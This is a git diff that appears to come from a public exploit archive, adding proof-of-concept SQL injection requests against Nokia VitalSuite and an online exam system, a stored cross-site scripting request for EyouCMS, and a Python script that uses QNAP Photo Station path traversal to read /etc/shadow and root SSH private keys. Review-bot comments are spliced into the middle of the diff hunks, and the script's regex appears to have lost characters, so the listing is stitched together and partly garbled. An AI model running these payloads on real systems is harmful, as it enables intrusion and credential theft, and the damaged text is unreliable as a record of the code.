diff --git a/exploits/multiple/webapps/48528.txt b/exploits/multiple/webapps/48528.txt
new file mode 100644
index 000000000..090d8ca73
--- /dev/null
+++ b/exploits/multiple/webapps/48528.txt
@@ -0,0 +1,31 @@
+# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Web App
+# Date: 2020-05-28
+# Vendor Homepage: https://www.nokia.com
+# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/
+# Affected Version: v2020
+# Tested on: MacosX
+# CVE : N/A
+
+
+# PoC
+
+
+POST /cgi-bin/vsloginadmin.exe HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Accept: /
+Accept-Encoding: gzip,deflate
+Content-Length: 84
+Host: berklocal
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
+like Gecko) Chrome/41.0.2228.0 Safari/537.21
+
+Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1
+
+Example Time-Based payload
+
+UserName=test'; waitfor delay '00:00:10' --
\ No newline at end of file
diff --git a/exploits/php/webapps/48529.txt b/exploits/php/webapps/48529.txt
new file mode 100644
index 000000000..edc18ebc4
--- /dev/null
+++ b/exploits/php/webapps/48529.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Web App
+# Date: 2020-05-28
+# Vendor Homepage: https://github.com/sunnygkp10/
+# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
+# Affected Version: 2015
+# Tested on: MacosX
+# CVE : N/A
+
+# PoC
+
+Affected code
+
+';
+$id=@$_GET['fid'];
+$result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or
+die('Error');
+
+http://berklocal/dash.php?fid=SQL-INJECTION
\ No newline at end of file
diff --git a/exploits/php/webapps/48530.txt b/exploits/php/webapps/48530.txt
new file mode 100644
index 000000000..7a139b6ae
--- /dev/null
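Review bot: The `Content-Length: 84` header in the PoC request does not match the 62-byte body shown beneath it (`Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1`), and `Accept: /` reads like a value that lost characters somewhere between capture and commit, so anyone replaying the request to confirm a vendor fix will have to recompute both. The advisory also states no remediation; a line such as `# Remediation: bind UserName as a query parameter instead of concatenating it (the waitfor delay payload is T-SQL, i.e. the backend is SQL Server)` would let defenders scope the affected component without re-deriving it from the payload.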
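Review bot: The affected-code excerpt shows `$id=@$_GET['fid']` interpolated straight into `mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ")`, but the advisory stops short of stating the fix; adding `# Fix: $stmt = mysqli_prepare($con, "SELECT * FROM feedback WHERE id=?"); mysqli_stmt_bind_param($stmt, "i", $id);` would give the project a concrete remediation, and the `@` on the `$_GET` read only hides the undefined-index notice rather than validating the value. The snippet also opens with a stray `';`, so its first line appears to have been cut, and the hunk header announces 22 lines while only 21 are recoverable here — worth re-checking the file as committed.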
+++ b/exploits/php/webapps/48530.txt
@@ -0,0 +1,30 @@
+# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting
+# Date: 2020-05-28
+# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
+# Vendor Homepage: https://eyoucms.com
+# Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip
+# Version: EyouCMS V1.4.6
+# Tested on: Windows
+# CVE : N/A
+
+Vulnerable Request:
+POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1
+Host: 192.168.31.244
+Content-Length: 131
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.31.244
+Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php
+Connection: close
+
+title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111&__token__=b90d4bf2356b81f65284238857b91ada
+
+
+
+王新峰 技术管理部
+中国银行保险信息技术管理有限公司
\ No newline at end of file
diff --git a/exploits/php/webapps/48531.py b/exploits/php/webapps/48531.py
new file mode 100755
index 000000000..f1bb85f4b
--- /dev/null
+++ b/exploits/php/webapps/48531.py
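Review bot: The "Vulnerable Request" carries only placeholder values (`title=test`, `addonFieldExt%5Bcontent%5D=111`) and the advisory never says which parameter is stored unescaped or which page later renders it, so neither the vendor nor a defender can locate the sink from this file alone. A single line after the request, such as `Stored via: PARAMETER_NAME ; rendered at: PAGE_PATH` (filled in by the author), would make the finding verifiable and point the fix at the right output-encoding site. The trailing signature lines are harmless but are not part of the PoC and could be moved into the `# Exploit Author` header.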
@@ -0,0 +1,103 @@
+# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
+# Exploit Author: Yunus YILDIRIM (Th3Gundy)
+# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
+# Date: 2020-05-28
+# Vendor Homepage: https://www.qnap.com
+# Version: QTS < 4.4.1 | Photo Station < 6.0.3
+# CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195
+# References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
+# References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
+# References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
+
+######################################################################
+######################################################################
+
+#!/usr/bin/python3
+
+__author__ = "Yunus YILDIRIM (@Th3Gundy)"
+__version__ = "0.1"
+
+
+import requests
+import re, sys
+
+# hide ssl error
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+def get_banner():
+ print("""\033[91m
+ █████ ███▄ █ ▄▄▄ ██▓███
+▒██▓ ██▒ ██ ▀█ █ ▒████▄ ▓██░ ██▒
+▒██▒ ██░▓██ ▀█ ██▒▒██ ▀█▄ ▓██░ ██▓▒
+░██ █▀ ░▓██▒ ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒
+░▒███▒█▄ ▒██░ ▓██░ ▓█ ▓██▒▒██▒ ░ ░
+░░ ▒▒░ ▒ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░▒▓▒░ ░ ░
+ ░ ▒░ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░░▒ ░
+ ░ ░ ░ ░ ░ ░ ▒ ░░
+ ░ ░ ░ ░ \033[0m \033[94m {0} \033[0m
+ """.format(__author__))
+
+
+def get_file_content(file):
+ post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
+ file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
+
+ print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text))
+
+# print banner
+get_banner()
+
+if len(sys.argv) != 2:
+ print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m")
+ sys.exit(-1)
+
+url = sys.argv[1].rstrip('/')
+headers = {"User-Agent": "Gundy - QNAP RCE"}
+
+# for session cookie
+req = requests.Session()
+
+#######################################################################
+# search album_id
+
+print("="*65)
+post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
+album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
+
+if album_id_response.status_code != 200:
+ print("album id not found \n\033[91mnot vulnerable\033[0m")
+ sys.exit(0)
+
+album_id = re.search('(?<=).*?(?=)', album_id_response.text).group()
+
+print("album_id ==> " + album_id)
+
+#######################################################################
+# search $_SESSION['access_code']
+
+access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
+if access_code_response.status_code != 200:
+ print("slideshow not found \n\033[91mnot vulnerable\033[0m")
+ sys.exit(0)
+
+access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
+
+print("access_code ==> " + access_code)
+
+#######################################################################
+
+# /etc/passwd file read
+get_file_content('./../../../../../etc/passwd')
+
+# /etc/shadow read
+get_file_content('./../../../../../etc/shadow')
+
+# /etc/hostname read
+get_file_content('./../../../../../etc/hostname')
+
+# /root/.ssh/id_rsa read
+get_file_content('./../../../../../root/.ssh/id_rsa')
+
+#######################################################################
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 98beb6865..2b9530404 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
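Review bot: The header (and the CSV entry) titles this "Remote Command Execution", but the committed script only exercises the file-read stage — the four `get_file_content('./../../../../../etc/passwd')`-style calls at the bottom — and never reaches any command-execution step, so the title overstates what the code demonstrates; either note this in the header (`# Note: this PoC covers the arbitrary file-read stage only; see the references for the full chain`) or retitle the entry. The `#!/usr/bin/python3` line sits after the comment banner, where the loader ignores it; it must be the first line of the file to have any effect. The `album_id` pattern `'(?<=).*?(?=)'` has an empty lookbehind and lookahead, which looks like delimiter text lost when the page was rendered rather than what was committed — compare against the repository bytes before trusting this listing. `get_file_content` reads `album_id`, `access_code`, `req`, `url` and `headers` as module globals that are only assigned further down the script, which works because it is called last but would be clearer as explicit parameters. For defenders, the traversal string in the `filename` field of the `video.php` request is the obvious log signature to alert on.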
@@ -42755,3 +42755,7 @@ id,file,description,date,author,type,platform,port
 48525,exploits/php/webapps/48525.txt,"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php,
 48526,exploits/php/webapps/48526.txt,"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting",2020-05-27,"China Banking and Insurance Information Technology Management Co.",webapps,php,
 48527,exploits/php/webapps/48527.txt,"OXID eShop 6.3.4 - 'sorting' SQL Injection",2020-05-27,VulnSpy,webapps,php,
+48528,exploits/multiple/webapps/48528.txt,"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection",2020-05-28,"Berk Dusunur",webapps,multiple,
+48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,
+48530,exploits/php/webapps/48530.txt,"EyouCMS 1.4.6 - Persistent Cross-Site Scripting",2020-05-28,"China Banking and Insurance Information Technology Management Co.",webapps,php,
+48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php,